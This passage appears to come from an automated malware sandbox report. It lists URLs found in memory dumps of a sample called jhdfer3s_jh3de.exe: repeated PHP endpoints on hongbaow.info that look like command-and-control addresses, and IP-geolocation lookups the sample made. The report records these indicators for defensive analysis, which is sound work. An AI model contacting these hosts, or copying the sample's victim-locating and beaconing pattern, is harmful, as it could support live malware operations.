00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1Tjhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpJjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/lofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000003.3028523059.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.189Sjhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpAjhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795674163.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/baow.info/lofzqFkc7.php9jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpVjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.189Fjhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1983537025.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpPjhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E36000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpQjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpFmjhdfer3s_jh3de.exe, 00000000.00000003.2034614808.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://api.iplocation.net/les_AutoUpdate_1jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php&jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.iplocation.net/Jjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpSanjhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1983537025.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php6jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpKajhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1983537025.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php7jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php9jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098751929.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443478222.000000000354E000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210212051.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326435724.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/lofzqFkc7.php9jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559176039.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210893502.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3377934957.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034572368.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325499865.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559878509.000000000354C000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028523059.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/#jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://myexternalip.com/4jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E53000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://hongbaow.info/1jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://hongbaow.info/5jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://hongbaow.info/9jhdfer3s_jh3de.exe, 00000000.00000003.1983688533.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860455007.0000000003550000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
